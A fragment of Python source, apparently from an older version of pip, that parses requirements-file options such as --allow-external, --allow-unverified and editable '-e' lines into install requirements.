elif line.startswith("--allow-external"):
line = line[len("--allow-external"):].strip().lstrip("=")
if finder:
finder.allow_external |= set([normalize_name(line).lower()])
elif line.startswith("--allow-all-external"):
if finder:
finder.allow_all_external = True
# Remove in 7.0
elif line.startswith("--no-allow-external"):
pass
# Remove in 7.0
elif line.startswith("--no-allow-insecure"):
pass
# Remove after 7.0
elif line.startswith("--allow-insecure"):
line = line[len("--allow-insecure"):].strip().lstrip("=")
if finder:
finder.allow_unverified |= set([normalize_name(line).lower()])
elif line.startswith("--allow-unverified"):
line = line[len("--allow-unverified"):].strip().lstrip("=")
if finder:
finder.allow_unverified |= set([normalize_name(line).lower()])
else:
comes_from = '-r %s (line %s)' % (filename, line_number)
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
req = InstallRequirement.from_editable(
line,
comes_from=comes_from,
default_vcs=options.default_vcs if options else None,
isolated=options.isolated_mode if options else False,
)
else:
req = InstallRequirement.from_line(
line,
comes_from,
isolated=options.isolated_mode if options else False,
)
yield req
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.